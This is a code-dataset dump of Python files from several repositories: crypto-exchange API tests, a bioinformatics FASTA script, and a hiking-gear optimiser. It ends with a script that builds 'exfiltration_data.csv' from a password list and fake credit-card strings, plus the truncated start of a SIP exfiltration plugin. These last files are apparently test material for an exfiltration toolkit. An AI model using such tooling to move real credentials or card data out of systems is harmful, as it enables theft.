repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
smk762/dex_stats_pymongo | dex_stats/utils/utils.py | <reponame>smk762/dex_stats_pymongo<gh_stars>1-10
from functools import wraps
from decimal import Decimal
from time import time
import numpy as np
def measure(func):
    """Decorator: report the wall-clock duration of every call to *func* in ms."""
    @wraps(func)
    def _time_it(*args, **kwargs):
        began = int(round(time() * 1000))
        try:
            return func(*args, **kwargs)
        finally:
            # Clamp to zero so clock jitter never prints a negative duration.
            elapsed = int(round(time() * 1000)) - began
            print(f"Total execution time for {func.__name__} : {max(elapsed, 0)} ms")
    return _time_it
def remove_exponent(d):
    """Strip trailing zeros/exponent from a Decimal without changing its value."""
    if d == d.to_integral():
        # Whole number: render without a fractional part (e.g. 2.000 -> 2).
        return d.quantize(Decimal(1))
    # Fractional number: drop trailing zeros (e.g. 1.500 -> 1.5).
    return d.normalize()
def enforce_float(num: "float | int | str") -> str:
    """Render *num* with exactly 10 decimal places, e.g. 1 -> "1.0000000000".

    Despite the historical name, the result is a ``str`` (the fixed-width form
    the JSON API layer expects); the original ``-> float`` annotation was wrong,
    as was ``[float, int, str]`` (a list literal, not a type).
    Numeric strings are now coerced first: ``"{:.10f}"`` raises ValueError on a
    ``str`` operand, so the str case advertised by the annotation used to crash.
    """
    if isinstance(num, str):
        num = float(num)
    return "{:.10f}".format(num)
def sort_orders(orders, reverse=False):
    """Return *orders* sorted by price (first field); ``reverse=True`` for descending."""
    def price_of(entry):
        return entry[0]
    return sorted(orders, key=price_of, reverse=reverse)
def prettify_orders(orders):
    """Format each [price, volume] entry as fixed-point strings for API output."""
    pretty = []
    for entry in orders:
        pretty.append([enforce_float(entry[0]), enforce_float(entry[1])])
    return pretty
def numforce_float(num) -> float:
    # Renders `num` positionally (no exponent) with at most 10 significant
    # digits, trimming trailing zeros and the dot, then re-formats fixed-width.
    # NOTE(review): despite the -> float annotation, enforce_float returns a
    # str -- the annotation looks wrong; confirm callers before changing it.
    # NOTE(review): enforce_float applies "{:.10f}" to the *string* numpy
    # returns, which raises ValueError -- presumably this path is unused; verify.
    return enforce_float(np.format_float_positional(num, unique=True, trim='-', precision=10)) |
smk762/dex_stats_pymongo | qa/conftest.py | import pytest
import json
@pytest.fixture(scope='session')
def test_params():
    # Session-wide fixture: load endpoint settings (ip/port/base/rel keys are
    # read by the tests) once per run from endpointconf.json in the current
    # working directory.
    with open('endpointconf.json', 'r') as f:
        params_dict = json.load(f)
    return params_dict
|
smk762/dex_stats_pymongo | qa/test_api.py | <filename>qa/test_api.py
import pytest
import requests
from pytest_utils.utils import validate_template
class TestAPI:
    """Black-box JSON-schema checks of the public REST endpoints.

    Each test fetches one endpoint (host/port come from the ``test_params``
    fixture) and validates the response body against a JSON schema via
    ``validate_template``.

    BUG FIX applied to the value patterns below: the originals such as
    ``\\A[0-9]+.[0-9]+|[0-9]+\\Z`` had an unescaped ``.`` (matched any char) and,
    because ``|`` binds loosest, anchored only one alternative -- so e.g.
    ``"1x5garbage"`` validated.  The alternation is now grouped and the dot
    escaped.
    """

    def test_ticker_call(self, test_params):
        """GET /api/v1/ticker: list of {PAIR: {base_volume, last_price, quote_volume}}."""
        schema_ticker = {
            'type': 'array',
            'items': {
                'type': 'object',
                'propertyNames': {'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"},
                'patternProperties': {"": {
                    'type': 'object',
                    'properties': {
                        'base_volume': {'type': ['number', 'integer']},
                        'last_price': {'type': ['string', 'integer']},
                        'quote_volume': {'type': ['number', 'integer']}
                    }}
                }
            }
        }
        header = {'accept': 'application/json'}
        url = ("http://" + test_params.get('ip') + ':' +
               test_params.get('port') + "/api/v1/ticker")
        res = requests.get(url, headers=header)
        assert validate_template(res.json(), schema_ticker)

    def test_summary_call(self, test_params):
        """GET /api/v1/summary: per-pair 24h trading statistics."""
        schema_summary = {
            'type': 'array',
            'items': {
                'type': 'object',
                'properties': {
                    'base_currency': {'type': 'string',
                                      'pattern': r"\A[A-Z0-9]+\Z"},
                    'base_volume_24h': {'type': ['integer', 'number']},
                    'highest_bid': {'type': 'string'},
                    'highest_price_24h': {'type': 'string'},
                    'last_price': {'type': 'string'},
                    'last_trade_time': {'type': ['integer', 'number']},
                    'lowest_ask': {'type': 'string'},
                    'lowest_price_24h': {'type': 'string'},
                    'price_change_percent_24h': {'type': 'string'},
                    'quote_currency': {'type': 'string',
                                       'pattern': r"\A[A-Z0-9]+\Z"},
                    'quote_volume_24h': {'type': ['integer', 'number']},
                    'trading_pair': {'type': 'string',
                                     'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"}
                }
            }
        }
        header = {'accept': 'application/json'}
        url = ("http://" + test_params.get('ip') + ':' +
               test_params.get('port') + "/api/v1/summary")
        res = requests.get(url, headers=header)
        assert validate_template(res.json(), schema_summary)

    def test_orderbook_call(self, test_params):
        """GET /api/v1/orderbook/<PAIR>: asks/bids as [price, volume] string pairs."""
        # Decimal-or-integer string, fully anchored (see class docstring).
        decimal_pattern = r"\A([0-9]+\.[0-9]+|[0-9]+)\Z"
        schema_orderbook = {
            'type': 'object',
            'propertyNames': {'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"},
            'patternProperties': {"": {
                'type': 'object',
                'properties': {
                    'asks': {
                        'type': 'array',
                        'items': {
                            'type': 'array',
                            'items': {
                                'type': 'string',
                                'pattern': decimal_pattern
                            },
                            'additionalItems': False,
                            'minItems': 2,
                            'maxItems': 2
                        }
                    },
                    'bids': {
                        'type': 'array',
                        'items': {
                            'type': 'array',
                            'items': {
                                'type': 'string',
                                'pattern': decimal_pattern
                            },
                            'additionalItems': False,
                            'minItems': 2,
                            'maxItems': 2
                        }
                    },
                    'timestamp': {
                        'type': 'integer'
                    }
                }
            }
            }
        }
        pair = test_params.get('base') + '_' + test_params.get('rel')
        header = {'accept': 'application/json'}
        url = ("http://" + test_params.get('ip') + ':' +
               test_params.get('port') + "/api/v1/orderbook/" + pair)
        res = requests.get(url, headers=header)
        assert validate_template(res.json(), schema_orderbook)

    def test_trades_call(self, test_params):
        """GET /api/v1/trades/<PAIR>: list of executed trades per pair."""
        schema_trades = {
            'type': 'object',
            'propertyNames': {'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"},
            'patternProperties': {"": {
                'type': 'array',
                'items': {
                    'type': 'object',
                    'properties': {
                        'base_volume': {'type': ['integer', 'number']},
                        'price': {
                            'type': 'string',
                            # BUG FIX: dot escaped (was matching any character).
                            'pattern': r"\A[0-9]+\.[0-9]+\Z"
                        },
                        'quote_volume': {'type': ['integer', 'number']},
                        'timestamp': {'type': 'integer'},
                        'trade_id': {
                            'type': 'string',
                            'pattern': r"\A[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\Z"
                        },
                        'type': {
                            'type': 'string',
                            # BUG FIX: group the alternation so \A and \Z anchor
                            # every alternative, not just the outermost two.
                            'pattern': r"\A(Buy|Sell|buy|sell)\Z"
                        }
                    }
                }
            }
            }
        }
        pair = test_params.get('base') + '_' + test_params.get('rel')
        header = {'accept': 'application/json'}
        url = ("http://" + test_params.get('ip') + ':' +
               test_params.get('port') + "/api/v1/trades/" + pair)
        res = requests.get(url, headers=header)
        assert validate_template(res.json(), schema_trades)
|
bgruening/funannotate | funannotate/utilities/get_longest_isoform.py | <reponame>bgruening/funannotate
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, re, os, gzip, argparse
from Bio import SeqIO
def main(inargs):
    """Parse CLI args and write the longest isoform per gene from a FASTA file."""
    # setup menu with argparse
    class MyFormatter(argparse.ArgumentDefaultsHelpFormatter):
        # Widen the help column so long option strings stay on one line.
        def __init__(self, prog):
            super(MyFormatter, self).__init__(prog, max_help_position=48)
    parser = argparse.ArgumentParser(prog='get_longest_isoform',
        description='''Script to extract longest isoform of protein or transcript file from funannotate or where gene is tagged in header.''',
        epilog="""Written by <NAME> (2022) @hyphaltip""",
        formatter_class=MyFormatter)
    parser.add_argument('-i', '--input', required=True,
                        help='fasta formatted transcript or protein file')
    parser.add_argument('-o', '--output', help='Output basename')
    parser.add_argument('-v', '--verbose', help='Extra verbose output',dest='verbose', default=False, action='store_true')
    args = parser.parse_args(inargs)
    genes = {}  # geneid -> longest SeqRecord seen so far
    if not args.output:
        args.output = args.input + ".longest"
    # funannotate-style transcript IDs end in "-T<number>".
    transmatch = re.compile(r'\-T\d+$')
    # Generic "gene:NAME" / "gene=NAME" tag anywhere in the description line.
    genematch = re.compile(r'gene[:=](\S+)')
    recCount = 0
    handle = args.input
    if args.input.endswith('.gz'):
        # NOTE(review): this gzip handle is never closed explicitly; it is
        # left to garbage collection.
        handle = gzip.open(args.input,"rt")
    for rec in SeqIO.parse(handle, "fasta"):
        id = rec.id
        description = rec.description
        geneid = id
        m = transmatch.search(id)
        if m:
            # assumes the second whitespace token of the description holds
            # the gene ID for "-T\d+" style records -- TODO confirm
            geneid = description.split()[1]
        else:
            m = genematch.search(description)
            if m:
                geneid = m.group(1)
        if geneid == id:
            # Could not derive a gene ID distinct from the record ID.
            if args.verbose:
                print("Warning: could not parse gene name from header '{}' '{}'".format(id,description))
        # Keep only the longest record seen for each gene.
        if geneid not in genes or len(rec) > len(genes[geneid]):
            genes[geneid] = rec
        recCount += 1
    print("{} genes and {} total sequences (isoforms) seen".format(len(genes),recCount))
    SeqIO.write(genes.values(),args.output,'fasta')
if __name__ == "__main__":
    # Run as a CLI script: forward argv (minus the program name) to main().
    main(sys.argv[1:])
|
sitandr/hike-dispenser | data_reader.py | import data_classes
import os
from tools import *
import help_parser
def read_data(args):
    """Load people, things and the values to optimise from the configured input.

    Two input modes, selected from *args*:
      * ``people_and_things_file`` -- two whitespace-separated text files
        (the "classic" format);
      * ``yaml_file`` -- one YAML document with optional ``config`` /
        ``optimize`` sections.

    Returns ``(people, things, to_optimize_values)`` where ``people`` is
    ``{name: Person}``, ``things`` is ``[Thing]`` and ``to_optimize_values``
    is ``{value_name: Value}``.
    Raises AttributeError for missing/invalid files and SyntaxError for
    malformed lines.
    """
    def default_optimize_values():
        # Single default value (usually weight) named by --v_name_default.
        return {args.v_name_default: data_classes.Value(args.v_name_default)}
    to_optimize_values = {}
    if args.people_and_things_file is not None:
        # "classic", simple way
        try:  # catch errors of file reading
            people_file, things_file = args.people_and_things_file
            assert os.path.isfile(people_file) and os.path.isfile(things_file)
        except AssertionError:
            raise AttributeError('Invalid file')
        try:
            people = {}
            data_classes.Value.pain = args.pain_multiply
            to_optimize_values = default_optimize_values()
            # People file: "<name> <optimal> <sensitivity>" per line; '#' comments.
            with open(people_file, encoding = 'utf-8') as people_fh:
                for line in people_fh:
                    if not len(line) or line[0] == '#':
                        continue
                    current = line.strip().split()
                    if not len(current):
                        continue
                    if args.auto_complete: current[1:] = auto_complete(current[1:], [10, 10])
                    people[current[0]] = data_classes.Person()
                    people[current[0]].name = current[0]
                    people[current[0]].values_optimal = {args.v_name_default: float(current[1])}
                    people[current[0]].values_sensitivity = {args.v_name_default: float(current[2])}
            things = []
            # Things file: "<name> <amount> <owner|None> <moral>" per line.
            with open(things_file, encoding = 'utf-8') as things_fh:
                for line in things_fh:
                    if not len(line) or line[0] == '#':
                        continue
                    current = line.strip().split()
                    if not len(current):
                        continue
                    if args.auto_complete: current[1:] = auto_complete(current[1:], [1.0, None, 0.0])
                    things.append(data_classes.Thing())
                    things[-1].name = current[0]
                    things[-1].values = {args.v_name_default: float(current[1])}
                    things[-1].owner = (None if current[2] == 'None' else current[2])
                    things[-1].moral = float(current[3])
        except IndexError:
            raise SyntaxError('Invalid file input length'
                              + ('. Try -a option to automaticly add insufficient values.' if not args.auto_complete else '') +
                              f' Error in line:\n{line}')
        except (TypeError, ValueError):
            raise SyntaxError(f'Invalid file input. Error in line:\n{line}')
    elif args.yaml_file is not None:
        assert os.path.isfile(args.yaml_file)
        import yaml
        # UniqueKeyLoader is a SafeLoader subclass, so untrusted input is safe.
        with open(args.yaml_file, encoding = 'utf-8') as yaml_fh:
            data = yaml.load(yaml_fh, Loader = UniqueKeyLoader)
        people = {}
        if 'config' in data:
            for attribute in data['config']:
                if help_parser.is_default(args, attribute):  # command (args) has more priority
                    setattr(args, attribute, data['config'][attribute])
        data_classes.Value.pain = args.pain_multiply
        data_classes.Person.inaccessibility = args.inaccessability_default
        if 'optimize' in data:
            for v_name in data['optimize'].keys():
                v = data_classes.Value(v_name)
                if 'pain' in data['optimize'][v_name]: v.pain = data['optimize'][v_name]['pain']
                to_optimize_values[v_name] = v
        else:
            # BUG FIX: previously assigned to_optimize_values[v_name] here, but
            # v_name is undefined when there is no 'optimize' section (NameError);
            # the intent is to fall back to the whole default dict.
            to_optimize_values = default_optimize_values()
        for person_name in data['people']:
            people[person_name] = data_classes.Person()
            people[person_name].name = person_name
            if 'inacs' in data['people'][person_name]:
                # BUG FIX: was misspelled 'inaccessability', so the per-person
                # value was set on an attribute nobody ever reads -- the Person
                # class and the optimiser use 'inaccessibility'.
                people[person_name].inaccessibility = data['people'][person_name]['inacs']
            for v in to_optimize_values:
                current_p = data['people'][person_name]
                people[person_name].values_optimal[v] = (current_p[v]['opt']
                                                         if (v in current_p and 'opt' in current_p[v]) else
                                                         args.opt_default)
                people[person_name].values_sensitivity[v] = (current_p[v]['sens']
                                                             if (v in current_p and 'sens' in current_p[v]) else
                                                             args.sens_default)
        things = []
        for thing_name in data['things']:
            things.append(data_classes.Thing())
            things[-1].name = thing_name
            d_thing = data['things'][thing_name]
            if 'owr' in d_thing:
                things[-1].owner = d_thing['owr']
            # NOTE(review): 'mrl' is mandatory here (KeyError when missing) while
            # 'owr' is optional -- confirm whether that asymmetry is intended.
            things[-1].moral = d_thing['mrl']
            things[-1].values = {v: d_thing[v] if v in d_thing else 0 for v in to_optimize_values}
    else:
        raise AttributeError('No input data provided')
    return people, things, to_optimize_values
|
sitandr/hike-dispenser | tools.py | <gh_stars>1-10
# modificated funcs from StackOverFlow
import math
try:
    import yaml

    class UniqueKeyLoader(yaml.SafeLoader):
        """SafeLoader that rejects duplicate mapping keys instead of silently
        keeping the last occurrence (PyYAML's default behaviour)."""
        def construct_mapping(self, node, deep=False):
            seen = []
            for key_node, value_node in node.value:
                key = self.construct_object(key_node, deep=deep)
                # A list (not a set) so unhashable keys don't crash the check.
                if key in seen:
                    raise SyntaxError(f'"{key}" is a duplicated key. Please try to make it different.')
                seen.append(key)
            return super().construct_mapping(node, deep)
except ImportError:
    # BUG FIX: "WARINIG" typo in the user-facing warning.
    print('WARNING: PyYAML lib not detected, using yaml files is impossible')
def print_progress_bar (iteration, total, prefix = '', suffix = '',
decimals = 1, length = 50, fill = '█', print_end = "\r"):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
printEnd - Optional : end character (e.g. "\r", "\r\n") (Str)
"""
# modified function from StackOverflow
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filled_length = length * iteration / total
extra, real_length = math.modf(filled_length)
real_length = int(real_length)
edge = ['-', '░', '▒', '▓'][int(extra*4)] if (length - real_length - 1 >= 0) else ''
bar = fill * real_length + edge + '-' * (length - real_length - 1)
print(f'{prefix} |{bar}| {percent}% {suffix}', end = print_end)
# Print New Line on Complete
if iteration == total:
print(' '*length*2, end = '\r')
def auto_complete(array, default_values):
    """Pad *array* in place with defaults for missing trailing fields.

    Mutates and returns the same list (hence the original "non-clear" warning).
    """
    missing = default_values[len(array):]
    array += missing
    return array
|
sitandr/hike-dispenser | data_classes.py | <reponame>sitandr/hike-dispenser
class Value:
    """A named quantity (e.g. weight) over which total pain is minimised."""
    name = '<undefined value name>'
    # Base pain multiplier at the optimal amount; assigned globally from the
    # CLI --pain_multiply flag, or per-value from the YAML 'optimize' section.
    pain = None
    def __init__(self, name):
        self.name = name
    def __repr__(self):
        return self.name
class Person:
    """A hike participant with per-value optimum and sensitivity settings."""
    name = '<undefined person name>'
    # Cost of involving this person in a thing transfer; class-level default
    # is overridden globally from the CLI.
    inaccessibility = 0

    def __init__(self):
        # Per-value dicts: {value_name: optimal amount / sensitivity factor}.
        self.values_optimal = {}
        self.values_sensitivity = {}

    def __repr__(self):
        optimal = ' '.join(f'{v}: {self.values_optimal[v]}'
                           for v in self.values_optimal)
        sens = ' '.join(f'{v}: {self.values_sensitivity[v]}'
                        for v in self.values_sensitivity)
        return self.name + ' optimal ' + optimal + ' sens ' + sens
class Thing:
    """An item to dispense: per-value amounts, an optional owner, a moral cost."""
    name = '<undefined thing name>'
    owner = None
    # Pain the owner gains when the thing is given to somebody else.
    moral = 0

    def __init__(self):
        # BUG FIX: `values` used to be a class-level mutable dict shared by every
        # instance, so mutating one Thing's values leaked into all others.
        # It is now a per-instance dict (callers that assign a fresh dict are
        # unaffected; Thing() still takes no arguments).
        self.values = {}

    def __repr__(self):
        return (self.name + ' ' +
                ' '.join([v + ': ' + str(self.values[v])
                          for v in self.values]) +
                f' owned by {self.owner} with moral debuff {self.moral}')
|
sitandr/hike-dispenser | help_parser.py | <filename>help_parser.py
import argparse
# Command-line interface. Fixed here: user-facing typos ("mininmizing",
# "sensevity"), the -u help text (claimed default 1_000, actual default 2_000)
# and the --sens_default help (copy-pasted "optimal" instead of "sensitivity").
parser = argparse.ArgumentParser(description='This program dispenses things to people (minimizing total pain) '
    'using annealing. As input it takes file with people descriptions (for each in each line there is name, '
    'optimal_weight and weight_sensitivity (number of times pain increases when mass increased by optimal_mass) '
    'in this order, separated by spaces/tabs) and things descriptions '
    '(similarly, in each line there is name, weight, owner and number of pain he gains from giving it to anybody else '
    'in this order separated by spaces/tabs). Default values are designed to <10 people and <50 things, so if your '
    'values are larger, it\'s recommended to change the default values. This means increasing number of iterations '
    'to get better result. If you do so, it\'s also recommended to increase gradient proportionally. However, the situation '
    'may be different, so it\'s best to modify according to circumstances.')
parser.add_argument('-t', '--people_and_things_files', dest = 'people_and_things_file', nargs = 2, type = str,
                    help='Input files with people and thing data,\
                    used with things file instead of yaml')
parser.add_argument('-y', '--yaml_file', dest = 'yaml_file', type = str, help='Input file with all data in yaml')
parser.add_argument('-o', '--output_file', dest = 'output_file', default = None,
                    help='Output file; if not specified, stdout is used')
parser.add_argument('-w', '--print_own', dest = 'print_own', action='store_true',
                    help='Print just current owners; useful for an overview')
parser.add_argument('-m', '--meeting_print', dest = 'meeting_print', action='store_true',
                    help='Print all transfer ways')
parser.add_argument('-i', '--inaccessability_default', dest = 'inaccessability_default', type=float, default = 0,
                    help='Default inaccessability; default is 0; adding any inaccessability decreases speed at ~20%%')
parser.add_argument('-l', '--print_log', dest = 'print_log', action='store_true',
                    help='Print total pain and temperature instead of progress bars')
parser.add_argument('-d', '--disable_progress_info', dest = 'disable_progress_info', action='store_true',
                    help='No progress info')
parser.add_argument('-u', '--update_freq', dest = 'update_freq', type=int, default = 2_000,
                    help='Number of iterations between updating bar/log; default is 2_000')
parser.add_argument('-a', '--auto_complete', dest = 'auto_complete', action='store_true',
                    help='Allows not full completed TEXT data files; people are auto-completed with 10 optimal_weight \
                    and 10 sensitivity; things have 1 kg mass and don\'t belong to anybody.')
parser.add_argument('-E', '--epoch_number', dest = 'epoch_number', type=int, default = 3,
                    help='Default number of general attempts; default is 3')
parser.add_argument('-I', '--iteration_number', dest = 'iteration_number', type=int, default = 300_000,
                    help='Default number of iteration in each attempt; if not specified, equals to 300_000')
parser.add_argument('-G', '--gradient', dest = 'gradient', type=float, default = 100_000,
                    help='Number of iterations it takes to decrease temperature in 10 times; default is 100_000')
parser.add_argument('-T', '--start_temperature', dest = 'start_temperature', type=float, default = 50,
                    help='Start temperature; default is 50 (pains)')
parser.add_argument('--pain_multiply', dest = 'pain_multiply', type=float, default = 10,
                    help='Default pain (at optimal weight); default is 10')
parser.add_argument('--opt_default', dest = 'opt_default', type=float, default = 10,
                    help='Default optimal value; default is 10')
parser.add_argument('--sens_default', dest = 'sens_default', type=float, default = 10,
                    help='Default sensitivity value; default is 10')
parser.add_argument('--v_name_default', dest = 'v_name_default', type=str, default = 'v',
                    help='Default value name; default is «v»')
def parse():
    """Parse CLI flags from sys.argv using the module-level `parser`."""
    return parser.parse_args()
def is_default(args, attribute):
    # True if *attribute* on the parsed *args* still holds the parser default;
    # used so YAML config values only override flags the user did not set.
    return getattr(args, attribute) == parser.get_default(attribute)
|
sitandr/hike-dispenser | dispenser.py | import random
import help_parser
import data_reader
from tools import print_progress_bar
import time
import optimize
from optimize import optimized_rand_move, generate_sequence, generate_transfer_from_seqence
args = help_parser.parse() # parse all given flags
people, things, to_optimize_values = data_reader.read_data(args)
enable_inacs = any([people[p].inaccessibility for p in people])
# inaccessibility, slightly decreases speed, so should be tracked
names = list(people.keys())
# Validate up-front that every owned thing references an existing person.
try:
    for thing in things:
        assert thing.owner in names or thing.owner == None
except AssertionError:
    raise SyntaxError(f'Owner of thing ({thing}) does not exist.')
def print_meet(transfer):
    """Build a per-person report of every thing hand-over (both directions)."""
    report = ''
    for person_name in names:
        report += person_name + ' :\n'
        for other in names:
            if other == person_name:
                continue
            outgoing = transfer[person_name, other]
            if outgoing:
                report += f'\t-> {other}: ' + ' '.join([t.name for t in outgoing]) + '\n'
            incoming = transfer[other, person_name]
            if incoming:
                report += f'\t{other} ->: ' + ' '.join([t.name for t in incoming]) + '\n'
    return report
def print_haul(seq):
    """Build a table of each person's assigned things and per-value load totals."""
    report = ''
    for person_name in seq:
        assigned = seq[person_name]
        col_name = '{:<15}'.format(person_name)
        col_things = '{:<80}'.format(', '.join(sorted([thing.name for thing in assigned])))
        col_loads = ' '
        for value_name in to_optimize_values:
            total = sum([thing.values[value_name] for thing in assigned])
            # Only label non-default values; the default one is implied.
            if value_name != args.v_name_default:
                col_loads += value_name
            col_loads += f' {round(total, 5)}/{people[person_name].values_optimal[value_name]} '
        report += col_name + ':' + col_things + col_loads + '\n'
    return report
# create "out" func that would work as file/print output
if args.output_file:
    # Accumulate everything in memory and write it out once at script end.
    all_text = ''
    def out(t): global all_text; all_text += t
else:
    out = print
# Inject shared state into the optimize module: it reads these module-level
# globals instead of taking parameters (for speed in the hot loop).
optimize.names = names
optimize.people = people
optimize.things = things
optimize.to_optimize_values = to_optimize_values
optimize.enable_inacs = enable_inacs
if not args.print_own:
    # Simulated annealing: several independent epochs, each starting from a
    # fresh random assignment, with exponentially decaying temperature.
    for attempt in range(args.epoch_number):
        sequence = generate_sequence()
        transfer = generate_transfer_from_seqence(sequence)
        if not args.disable_progress_info:
            print(f'Epoch {attempt + 1}/{args.epoch_number}')
        for i in range(args.iteration_number):
            # Temperature drops by 10x every `gradient` iterations.
            T = args.start_temperature*10**(-i/args.gradient)
            optimized_rand_move(transfer, sequence, T*random.random())
            if not i%args.update_freq:
                if args.print_log:
                    # BUG FIX: count_pain was called unqualified but is never
                    # imported by name (only the module is) -> NameError with
                    # --print_log. Call it through the optimize module instead.
                    print(round(optimize.count_pain(sequence), 2), round(T, 3))
                elif not args.disable_progress_info:
                    print_progress_bar(i, args.iteration_number, prefix = 'Progress:',
                                       suffix = 'Complete')
        if not args.disable_progress_info and not args.print_log:
            print_progress_bar(args.iteration_number, args.iteration_number)
        text = (f'\nAttempt {attempt + 1}. Total pain: {optimize.count_pain(sequence)}. Full info:\n'
                + print_haul(sequence))
        if args.meeting_print:
            text += '\n' + print_meet(generate_transfer_from_seqence(sequence))
        out(text)
else:
    # print just owners
    start_sequence = {name: [] for name in names}
    for thing in things:
        name = thing.owner
        if name is None:
            continue
        start_sequence[name].append(thing)
    out(print_haul(start_sequence))
if args.output_file:
    # Flush the accumulated report in one write; `with` closes the file
    # (the original leaked the handle).
    with open(args.output_file, 'w', encoding = 'utf-8') as report_file:
        report_file.write(all_text)
|
sitandr/hike-dispenser | optimize.py | import random
# Shared state injected by dispenser.py before the optimiser runs:
names = None                # list of person names
things = None               # list of Thing objects to dispense
to_optimize_values = None   # {value_name: Value} being minimised over
people = None               # {name: Person}
enable_inacs = False        # whether transfer/inaccessibility bookkeeping is on
def generate_transfer_from_seqence(seq):
    """Rebuild the {(giver, taker): [things]} transfer table from an assignment.

    Quadratic in the number of people ("very slow"); used only at epoch setup
    and for reporting -- the hot loop maintains the table incrementally.
    """
    table = {(giver, taker): [] for giver in names for taker in names}
    # what FIRST GIVES (and second takes)
    for taker in seq:
        for item in seq[taker]:
            if item.owner is not None and item.owner != taker:
                table[item.owner, taker].append(item)  # owner GIVES
    return table
def generate_sequence():
    """Assign every thing to a uniformly random person; returns {name: [things]}."""
    assignment = {person: [] for person in names}
    for item in things:
        assignment[random.choice(names)].append(item)
    return assignment
def personal_pain(things, person_name):
    """Pain felt by *person_name* when carrying exactly *things*.

    Sum of the moral cost of items owned by somebody else, plus -- for each
    optimised value -- an exponential penalty for deviating from that person's
    optimal load. Kept separate so a random move only re-evaluates the two
    people it touches.
    """
    person = people[person_name]
    total = sum(item.moral for item in things if item.owner != person_name)
    for value_name in to_optimize_values:
        load = sum([item.values[value_name] for item in things])
        optimal = person.values_optimal[value_name]
        sensitivity = person.values_sensitivity[value_name]
        total += to_optimize_values[value_name].pain * sensitivity ** (load / optimal - 1)
        # TODO: pain_multiply <- file
    return total
def count_pain(seq):
    """Total pain of an assignment; used only for reporting, not the hot loop."""
    return sum(personal_pain(seq[person_name], person_name)
               for person_name in seq)
def transfer_move(transfer, thing, from_, to_):
    # Update the transfer table for moving `thing` from `from_` to `to_` and
    # return the resulting change in inaccessibility energy
    # (negative = a meeting between two people was eliminated).
    if thing.owner is None: return 0
    add_energy = 0
    if thing.owner != from_:
        transfer[thing.owner, from_].remove(thing)
        if not (transfer[thing.owner, from_] or transfer[from_, thing.owner]): # removed all, transfer is deleted -> good
            add_energy -= people[from_].inaccessibility + people[thing.owner].inaccessibility
    if thing.owner != to_:
        # Check emptiness BEFORE appending: the order of these two lines matters.
        if not (transfer[thing.owner, to_] or transfer[to_, thing.owner]): # before addition was empty; transfer created -> bad
            add_energy += people[to_].inaccessibility + people[thing.owner].inaccessibility
        transfer[thing.owner, to_].append(thing)
    return add_energy
def optimized_rand_move(transfer, seq, extra_energy):
    """Attempt one random annealing move (swap or relocate) between two people.

    `extra_energy` is the temperature allowance: the move is kept when the
    resulting pain increase fits within it, otherwise it is rolled back.
    Only the two affected people's pain is re-evaluated.
    """
    # BUG FIX: random.sample() requires a sequence -- passing dict_keys raises
    # TypeError on Python 3.11+ (deprecated since 3.9).
    from_p, to_p = random.sample(list(seq), 2)
    things_from, things_to = seq[from_p], seq[to_p]
    if not len(things_from):
        # interrupt if person we want to take from hasn't things at all
        return
    # to count energy difference should be known only the energy that changes
    start_energy = (personal_pain(things_from, from_p) +
                    personal_pain(things_to, to_p))
    thing_from = random.randrange(len(things_from))
    add_energy = 0
    if random.random() < 0.5 and len(things_to):
        # swap one random thing from each side
        thing_to = random.randrange(len(things_to))
        if enable_inacs:
            add_energy += transfer_move(transfer, things_from[thing_from], from_p, to_p)
            add_energy += transfer_move(transfer, things_to[thing_to], to_p, from_p)
        things_from[thing_from], things_to[thing_to] = (things_to[thing_to],
                                                        things_from[thing_from])
        def reverse():
            # Undo the swap (and its transfer bookkeeping) when rejected.
            things_from[thing_from], things_to[thing_to] = (things_to[thing_to],
                                                            things_from[thing_from])
            if enable_inacs:
                transfer_move(transfer, things_from[thing_from], to_p, from_p)
                transfer_move(transfer, things_to[thing_to], from_p, to_p)
    else:
        # move one thing from from_p to to_p
        thing = things_from.pop(thing_from)
        things_to.append(thing)
        if enable_inacs: add_energy += transfer_move(transfer, thing, from_p, to_p)
        def reverse():
            if enable_inacs: transfer_move(transfer, thing, to_p, from_p)
            things_from.append(things_to.pop())
    final_energy = (personal_pain(things_from, from_p) +
                    personal_pain(things_to, to_p))
    # Accept only if the total energy change fits the temperature allowance;
    # otherwise roll the move back.
    if final_energy + extra_energy + add_energy > start_energy:
        reverse()
|
NickFleece/DET | etc/data_processing.py | <filename>etc/data_processing.py
import csv
import random
data = {
"passwords":[],
"cc_numbers":[]
}
print("Getting password values")
#get the passwords
passwords = []
with open('pwd.csv') as csvfile:
spamreader = csv.reader(csvfile)
for row in spamreader:
data["passwords"].append([row[0]])
print("Generating CC values")
#generate some cc numbers
for i in range(0, 500000):
cc_number = [str(random.randint(0,9)) for _ in range(16)]
cc_cvv = [str(random.randint(0,9)) for _ in range(16)]
cc_exp = [str(random.randint(0,9)) for _ in range(4)]
cc = "".join(cc_number) + "/" + "".join(cc_cvv) + "/" + "".join(cc_exp)
data["cc_numbers"].append([cc])
print("Final randomization and save")
final_data = []
for key in data.keys():
print("Adding " + key + " size:" + str(len(data[key])))
for i in data[key]:
final_data.append(i)
random.shuffle(final_data)
with open('exfiltration_data.csv', 'wb') as file:
writer = csv.writer(file, delimiter=',')
writer.writerows(final_data) |
NickFleece/DET | plugins/sip.py | #!/usr/bin/env python
#inspired from: https://books.google.fr/books?id=cHOmCwAAQBAJ&pg=PA747&lpg=PA747&dq=sdp+smime&source=bl&ots=34LYW5iJyc&sig=4a1szVXKMDtqQWUb0K2gM29AgL8&hl=fr&sa=X&ved=0ahUKEwjbm5Tf1JzTAhUGfxoKHX-UCQUQ6AEIVTAG#v=onepage&q=sdp%20smime&f=false
from __future__ import print_function
from dpkt import sip
import socket
import string
import random
import base64
import re
from random import choice
import traceback
config = None           # plugin configuration dict, injected by the host framework
app_exfiltrate = None   # host application hooks (logging, data retrieval), injected
#Ideally replace with real employee names
